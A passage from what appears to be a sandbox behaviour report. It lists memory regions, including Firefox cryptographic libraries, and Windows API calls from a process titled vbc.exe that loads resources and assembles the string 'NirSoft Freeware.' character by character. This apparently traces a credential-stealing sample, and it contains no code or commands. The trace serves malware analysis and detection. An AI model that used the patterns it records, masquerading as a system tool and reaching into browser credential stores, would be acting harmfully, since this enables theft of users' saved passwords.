0x70ff0000 region_type = mapped_file name = "softokn3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll") Region: id = 1149 start_va = 0x70fd0000 end_va = 0x70fe8fff entry_point = 0x70fd0000 region_type = mapped_file name = "nssdbm3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll") Region: id = 1150 start_va = 0x70f70000 end_va = 0x70fc4fff entry_point = 0x70f70000 region_type = mapped_file name = "freebl3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll") Region: id = 1151 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1152 start_va = 0x370000 end_va = 0x385fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1153 start_va = 0x390000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 1154 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1155 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1156 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1157 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1158 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1159 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1160 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1161 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1162 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1163 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1164 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1165 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1166 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1167 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1168 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1169 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1170 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1171 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1172 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1173 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1174 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1175 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1176 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1177 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1178 start_va = 0x76ec0000 end_va = 0x76ec5fff entry_point = 0x76ec0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1179 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1180 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1181 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1182 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1183 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1184 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1185 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1186 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1187 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1188 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1189 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1190 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1191 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1192 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1193 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1194 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1195 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1196 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1197 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1198 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1199 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1200 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1201 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1202 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1203 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1204 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1205 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1206 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1207 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1208 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1209 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1210 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1211 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1212 start_va = 0x370000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Thread: id = 115 os_tid = 0xce8 [0066.902] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0066.902] __set_app_type (_Type=0x2) [0066.902] __p__fmode () returned 0x77984d6c [0066.902] __p__commode () returned 0x77985b1c [0066.902] __wgetmainargs (in: _Argc=0x19ff54, _Argv=0x19ff58, _Env=0x19ff5c, _DoWildCard=0, _StartInfo=0x19ff60 | out: _Argc=0x19ff54, _Argv=0x19ff58, _Env=0x19ff5c) returned 0 [0066.902] _onexit (_Func=0x444e39) returned 0x444e39 [0066.902] _onexit (_Func=0x444e4a) returned 0x444e4a [0066.902] _onexit (_Func=0x444e5b) returned 0x444e5b [0066.902] _onexit (_Func=0x444e7a) returned 0x444e7a [0066.902] _onexit (_Func=0x444ebb) returned 0x444ebb [0066.902] _onexit (_Func=0x444ecc) returned 0x444ecc [0066.902] GetStartupInfoW (in: lpStartupInfo=0x19ff08 | out: lpStartupInfo=0x19ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0066.903] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0066.903] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x71ad0000 [0066.903] GetProcAddress (hModule=0x71ad0000, lpProcName="InitCommonControlsEx") returned 0x71ad5000 [0066.903] InitCommonControlsEx (picce=0x19cd70) returned 1 [0066.904] FreeLibrary (hLibModule=0x71ad0000) returned 1 [0066.904] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x752c0000 [0066.904] GetProcAddress (hModule=0x752c0000, lpProcName="SHGetSpecialFolderPathW") returned 0x7544edb0 [0066.904] SetErrorMode (uMode=0x8001) returned 0x0 [0066.904] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0066.904] EnumResourceTypesW (hModule=0x400000, lpEnumFunc=0x414266, lParam=0x0) returned 1 [0066.904] EnumResourceNamesW (hModule=0x400000, lpType=0x1, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.904] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x1) returned 0x454698 [0066.904] SizeofResource (hModule=0x400000, hResInfo=0x454698) returned 0x134 [0066.904] LoadResource (hModule=0x400000, hResInfo=0x454698) returned 0x454958 [0066.904] LockResource (hResData=0x454958) returned 0x454958 [0066.904] EnumResourceNamesW (hModule=0x400000, lpType=0x2, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.904] FindResourceW (hModule=0x400000, lpName=0x68, lpType=0x2) returned 0x4546a8 [0066.904] SizeofResource (hModule=0x400000, hResInfo=0x4546a8) returned 0x3e8 [0066.904] LoadResource (hModule=0x400000, hResInfo=0x4546a8) returned 0x454a8c [0066.904] LockResource (hResData=0x454a8c) returned 0x454a8c [0066.904] FindResourceW (hModule=0x400000, lpName=0x85, lpType=0x2) returned 0x4546b8 [0066.904] SizeofResource (hModule=0x400000, hResInfo=0x4546b8) returned 0xd8 [0066.904] LoadResource (hModule=0x400000, hResInfo=0x4546b8) returned 0x454e74 [0066.904] LockResource (hResData=0x454e74) returned 0x454e74 [0066.904] FindResourceW (hModule=0x400000, lpName=0x86, lpType=0x2) returned 0x4546c8 [0066.904] SizeofResource (hModule=0x400000, hResInfo=0x4546c8) returned 0xd8 [0066.904] LoadResource (hModule=0x400000, hResInfo=0x4546c8) returned 0x454f4c [0066.904] LockResource (hResData=0x454f4c) returned 0x454f4c [0066.904] EnumResourceNamesW (hModule=0x400000, lpType=0x3, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.905] FindResourceW (hModule=0x400000, lpName=0x2, lpType=0x3) returned 0x4546d8 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x4546d8) returned 0x10a8 [0066.905] LoadResource (hModule=0x400000, hResInfo=0x4546d8) returned 0x455024 [0066.905] LockResource (hResData=0x455024) returned 0x455024 [0066.905] FindResourceW (hModule=0x400000, lpName=0x3, lpType=0x3) returned 0x4546e8 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x4546e8) returned 0x468 [0066.905] LoadResource (hModule=0x400000, hResInfo=0x4546e8) returned 0x4560cc [0066.905] LockResource (hResData=0x4560cc) returned 0x4560cc [0066.905] FindResourceW (hModule=0x400000, lpName=0x4, lpType=0x3) returned 0x4546f8 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x4546f8) returned 0x468 [0066.905] LoadResource (hModule=0x400000, hResInfo=0x4546f8) returned 0x456534 [0066.905] LockResource (hResData=0x456534) returned 0x456534 [0066.905] FindResourceW (hModule=0x400000, lpName=0x5, lpType=0x3) returned 0x454708 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x454708) returned 0x468 [0066.905] LoadResource (hModule=0x400000, hResInfo=0x454708) returned 0x45699c [0066.905] LockResource (hResData=0x45699c) returned 0x45699c [0066.905] FindResourceW (hModule=0x400000, lpName=0x6, lpType=0x3) returned 0x454718 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x454718) returned 0x468 [0066.905] LoadResource (hModule=0x400000, hResInfo=0x454718) returned 0x456e04 [0066.905] LockResource (hResData=0x456e04) returned 0x456e04 [0066.905] FindResourceW (hModule=0x400000, lpName=0x7, lpType=0x3) returned 0x454728 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x454728) returned 0x468 [0066.905] LoadResource (hModule=0x400000, hResInfo=0x454728) returned 0x45726c [0066.905] LockResource (hResData=0x45726c) returned 0x45726c [0066.905] FindResourceW (hModule=0x400000, lpName=0x8, lpType=0x3) returned 0x454738 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x454738) returned 0x468 [0066.905] LoadResource (hModule=0x400000, hResInfo=0x454738) returned 0x4576d4 [0066.905] LockResource (hResData=0x4576d4) returned 0x4576d4 [0066.905] FindResourceW (hModule=0x400000, lpName=0x9, lpType=0x3) returned 0x454748 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x454748) returned 0x468 [0066.905] LoadResource (hModule=0x400000, hResInfo=0x454748) returned 0x457b3c [0066.905] LockResource (hResData=0x457b3c) returned 0x457b3c [0066.905] FindResourceW (hModule=0x400000, lpName=0xa, lpType=0x3) returned 0x454758 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x454758) returned 0x468 [0066.905] LoadResource (hModule=0x400000, hResInfo=0x454758) returned 0x457fa4 [0066.905] LockResource (hResData=0x457fa4) returned 0x457fa4 [0066.905] EnumResourceNamesW (hModule=0x400000, lpType=0x4, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.905] FindResourceW (hModule=0x400000, lpName=0x66, lpType=0x4) returned 0x454768 [0066.905] SizeofResource (hModule=0x400000, hResInfo=0x454768) returned 0x45e [0066.905] LoadResource (hModule=0x400000, hResInfo=0x454768) returned 0x45840c [0066.905] LockResource (hResData=0x45840c) returned 0x45840c [0066.906] FindResourceW (hModule=0x400000, lpName=0x68, lpType=0x4) returned 0x454778 [0066.906] SizeofResource (hModule=0x400000, hResInfo=0x454778) returned 0x1f4 [0066.906] LoadResource (hModule=0x400000, hResInfo=0x454778) returned 0x45886c [0066.906] LockResource (hResData=0x45886c) returned 0x45886c [0066.906] EnumResourceNamesW (hModule=0x400000, lpType=0x5, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.906] FindResourceW (hModule=0x400000, lpName=0x69, lpType=0x5) returned 0x454788 [0066.906] SizeofResource (hModule=0x400000, hResInfo=0x454788) returned 0xa2 [0066.906] LoadResource (hModule=0x400000, hResInfo=0x454788) returned 0x458a60 [0066.906] LockResource (hResData=0x458a60) returned 0x458a60 [0066.906] FindResourceW (hModule=0x400000, lpName=0x6b, lpType=0x5) returned 0x454798 [0066.906] SizeofResource (hModule=0x400000, hResInfo=0x454798) returned 0x296 [0066.906] LoadResource (hModule=0x400000, hResInfo=0x454798) returned 0x458b04 [0066.906] LockResource (hResData=0x458b04) returned 0x458b04 [0066.906] FindResourceW (hModule=0x400000, lpName=0x6e, lpType=0x5) returned 0x4547a8 [0066.906] SizeofResource (hModule=0x400000, hResInfo=0x4547a8) returned 0x5be [0066.906] LoadResource (hModule=0x400000, hResInfo=0x4547a8) returned 0x458d9c [0066.906] LockResource (hResData=0x458d9c) returned 0x458d9c [0066.906] FindResourceW (hModule=0x400000, lpName=0x70, lpType=0x5) returned 0x4547b8 [0066.906] SizeofResource (hModule=0x400000, hResInfo=0x4547b8) returned 0xfa [0066.906] LoadResource (hModule=0x400000, hResInfo=0x4547b8) returned 0x45935c [0066.906] LockResource (hResData=0x45935c) returned 0x45935c [0066.906] FindResourceW (hModule=0x400000, lpName=0x72, lpType=0x5) returned 0x4547c8 [0066.906] SizeofResource (hModule=0x400000, hResInfo=0x4547c8) returned 0xd8 [0066.906] LoadResource (hModule=0x400000, hResInfo=0x4547c8) returned 0x459458 [0066.906] LockResource (hResData=0x459458) returned 0x459458 [0066.906] FindResourceW (hModule=0x400000, lpName=0x448, lpType=0x5) returned 0x4547d8 [0066.906] SizeofResource (hModule=0x400000, hResInfo=0x4547d8) returned 0x336 [0066.906] LoadResource (hModule=0x400000, hResInfo=0x4547d8) returned 0x459530 [0066.906] LockResource (hResData=0x459530) returned 0x459530 [0066.906] EnumResourceNamesW (hModule=0x400000, lpType=0x6, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.906] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x6) returned 0x4547e8 [0066.906] SizeofResource (hModule=0x400000, hResInfo=0x4547e8) returned 0x234 [0066.906] LoadResource (hModule=0x400000, hResInfo=0x4547e8) returned 0x459868 [0066.907] LockResource (hResData=0x459868) returned 0x459868 [0066.907] FindResourceW (hModule=0x400000, lpName=0x20, lpType=0x6) returned 0x4547f8 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x4547f8) returned 0x138 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x4547f8) returned 0x459a9c [0066.907] LockResource (hResData=0x459a9c) returned 0x459a9c [0066.907] FindResourceW (hModule=0x400000, lpName=0x23, lpType=0x6) returned 0x454808 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454808) returned 0x58 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454808) returned 0x459bd4 [0066.907] LockResource (hResData=0x459bd4) returned 0x459bd4 [0066.907] FindResourceW (hModule=0x400000, lpName=0x26, lpType=0x6) returned 0x454818 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454818) returned 0xf6 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454818) returned 0x459c2c [0066.907] LockResource (hResData=0x459c2c) returned 0x459c2c [0066.907] FindResourceW (hModule=0x400000, lpName=0x27, lpType=0x6) returned 0x454828 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454828) returned 0xa4 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454828) returned 0x459d24 [0066.907] LockResource (hResData=0x459d24) returned 0x459d24 [0066.907] FindResourceW (hModule=0x400000, lpName=0x2f, lpType=0x6) returned 0x454838 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454838) returned 0x44 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454838) returned 0x459dc8 [0066.907] LockResource (hResData=0x459dc8) returned 0x459dc8 [0066.907] FindResourceW (hModule=0x400000, lpName=0x30, lpType=0x6) returned 0x454848 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454848) returned 0x120 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454848) returned 0x459e0c [0066.907] LockResource (hResData=0x459e0c) returned 0x459e0c [0066.907] FindResourceW (hModule=0x400000, lpName=0x3f, lpType=0x6) returned 0x454858 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454858) returned 0xba [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454858) returned 0x459f2c [0066.907] LockResource (hResData=0x459f2c) returned 0x459f2c [0066.907] FindResourceW (hModule=0x400000, lpName=0x40, lpType=0x6) returned 0x454868 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454868) returned 0x62 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454868) returned 0x459fe8 [0066.907] LockResource (hResData=0x459fe8) returned 0x459fe8 [0066.907] FindResourceW (hModule=0x400000, lpName=0x52, lpType=0x6) returned 0x454878 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454878) returned 0x68 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454878) returned 0x45a04c [0066.907] LockResource (hResData=0x45a04c) returned 0x45a04c [0066.907] EnumResourceNamesW (hModule=0x400000, lpType=0x9, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.907] FindResourceW (hModule=0x400000, lpName=0x67, lpType=0x9) returned 0x454888 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454888) returned 0x58 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454888) returned 0x45a0b4 [0066.907] LockResource (hResData=0x45a0b4) returned 0x45a0b4 [0066.907] EnumResourceNamesW (hModule=0x400000, lpType=0xc, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.907] FindResourceW (hModule=0x400000, lpName=0x67, lpType=0xc) returned 0x454898 [0066.907] SizeofResource (hModule=0x400000, hResInfo=0x454898) returned 0x14 [0066.907] LoadResource (hModule=0x400000, hResInfo=0x454898) returned 0x45a10c [0066.907] LockResource (hResData=0x45a10c) returned 0x45a10c [0066.908] EnumResourceNamesW (hModule=0x400000, lpType=0xe, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.908] FindResourceW (hModule=0x400000, lpName=0x65, lpType=0xe) returned 0x4548a8 [0066.908] SizeofResource (hModule=0x400000, hResInfo=0x4548a8) returned 0x14 [0066.908] LoadResource (hModule=0x400000, hResInfo=0x4548a8) returned 0x45a120 [0066.908] LockResource (hResData=0x45a120) returned 0x45a120 [0066.908] FindResourceW (hModule=0x400000, lpName=0x6f, lpType=0xe) returned 0x4548b8 [0066.908] SizeofResource (hModule=0x400000, hResInfo=0x4548b8) returned 0x14 [0066.908] LoadResource (hModule=0x400000, hResInfo=0x4548b8) returned 0x45a134 [0066.908] LockResource (hResData=0x45a134) returned 0x45a134 [0066.908] FindResourceW (hModule=0x400000, lpName=0x70, lpType=0xe) returned 0x4548c8 [0066.908] SizeofResource (hModule=0x400000, hResInfo=0x4548c8) returned 0x14 [0066.908] LoadResource (hModule=0x400000, hResInfo=0x4548c8) returned 0x45a148 [0066.908] LockResource (hResData=0x45a148) returned 0x45a148 [0066.908] FindResourceW (hModule=0x400000, lpName=0x72, lpType=0xe) returned 0x4548d8 [0066.908] SizeofResource (hModule=0x400000, hResInfo=0x4548d8) returned 0x14 [0066.908] LoadResource (hModule=0x400000, hResInfo=0x4548d8) returned 0x45a15c [0066.908] LockResource (hResData=0x45a15c) returned 0x45a15c [0066.908] FindResourceW (hModule=0x400000, lpName=0x73, lpType=0xe) returned 0x4548e8 [0066.908] SizeofResource (hModule=0x400000, hResInfo=0x4548e8) returned 0x14 [0066.908] LoadResource (hModule=0x400000, hResInfo=0x4548e8) returned 0x45a170 [0066.908] LockResource (hResData=0x45a170) returned 0x45a170 [0066.908] FindResourceW (hModule=0x400000, lpName=0x74, lpType=0xe) returned 0x4548f8 [0066.908] SizeofResource (hModule=0x400000, hResInfo=0x4548f8) returned 0x14 [0066.908] LoadResource (hModule=0x400000, hResInfo=0x4548f8) returned 0x45a184 [0066.908] LockResource (hResData=0x45a184) returned 0x45a184 [0066.908] FindResourceW (hModule=0x400000, lpName=0x75, lpType=0xe) returned 0x454908 [0066.908] SizeofResource (hModule=0x400000, hResInfo=0x454908) returned 0x14 [0066.908] LoadResource (hModule=0x400000, hResInfo=0x454908) returned 0x45a198 [0066.908] LockResource (hResData=0x45a198) returned 0x45a198 [0066.908] FindResourceW (hModule=0x400000, lpName=0x76, lpType=0xe) returned 0x454918 [0066.908] SizeofResource (hModule=0x400000, hResInfo=0x454918) returned 0x14 [0066.908] LoadResource (hModule=0x400000, hResInfo=0x454918) returned 0x45a1ac [0066.908] LockResource (hResData=0x45a1ac) returned 0x45a1ac [0066.908] FindResourceW (hModule=0x400000, lpName=0x77, lpType=0xe) returned 0x454928 [0066.908] SizeofResource (hModule=0x400000, hResInfo=0x454928) returned 0x14 [0066.908] LoadResource (hModule=0x400000, hResInfo=0x454928) returned 0x45a1c0 [0066.908] LockResource (hResData=0x45a1c0) returned 0x45a1c0 [0066.908] EnumResourceNamesW (hModule=0x400000, lpType=0x10, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.908] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x10) returned 0x454938 [0066.909] SizeofResource (hModule=0x400000, hResInfo=0x454938) returned 0x308 [0066.909] LoadResource (hModule=0x400000, hResInfo=0x454938) returned 0x45a1d4 [0066.909] LockResource (hResData=0x45a1d4) returned 0x45a1d4 [0066.909] EnumResourceNamesW (hModule=0x400000, lpType=0x18, lpEnumFunc=0x4141e0, lParam=0x0) returned 1 [0066.909] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x18) returned 0x454948 [0066.909] SizeofResource (hModule=0x400000, hResInfo=0x454948) returned 0x445 [0066.909] LoadResource (hModule=0x400000, hResInfo=0x454948) returned 0x45a4dc [0066.909] LockResource (hResData=0x45a4dc) returned 0x45a4dc [0066.909] wcscpy (in: _Dest=0x19cd20, _Source="Arial" | out: _Dest="Arial") returned="Arial" [0066.909] CreateFontIndirectW (lplf=0x19cd04) returned 0x80a075d [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="N", _Count=0x1 | out: _Dest="N") returned="N" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="i", _Count=0x1 | out: _Dest="Ni") returned="Ni" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="r", _Count=0x1 | out: _Dest="Nir") returned="Nir" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="S", _Count=0x1 | out: _Dest="NirS") returned="NirS" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="o", _Count=0x1 | out: _Dest="NirSo") returned="NirSo" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="f", _Count=0x1 | out: _Dest="NirSof") returned="NirSof" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="t", _Count=0x1 | out: _Dest="NirSoft") returned="NirSoft" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source=" ", _Count=0x1 | out: _Dest="NirSoft ") returned="NirSoft " [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="F", _Count=0x1 | out: _Dest="NirSoft F") returned="NirSoft F" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="r", _Count=0x1 | out: _Dest="NirSoft Fr") returned="NirSoft Fr" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="e", _Count=0x1 | out: _Dest="NirSoft Fre") returned="NirSoft Fre" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="e", _Count=0x1 | out: _Dest="NirSoft Free") returned="NirSoft Free" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freew") returned="NirSoft Freew" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="a", _Count=0x1 | out: _Dest="NirSoft Freewa") returned="NirSoft Freewa" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="r", _Count=0x1 | out: _Dest="NirSoft Freewar") returned="NirSoft Freewar" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source="e", _Count=0x1 | out: _Dest="NirSoft Freeware") returned="NirSoft Freeware" [0066.909] wcsncat (in: _Dest=0x19d26a, _Source=".", _Count=0x1 | out: _Dest="NirSoft Freeware.") returned="NirSoft Freeware." [0066.909] wcsncat (in: _Dest=0x19d26a, _Source=" ", _Count=0x1 | out: _Dest="NirSoft Freeware. ") 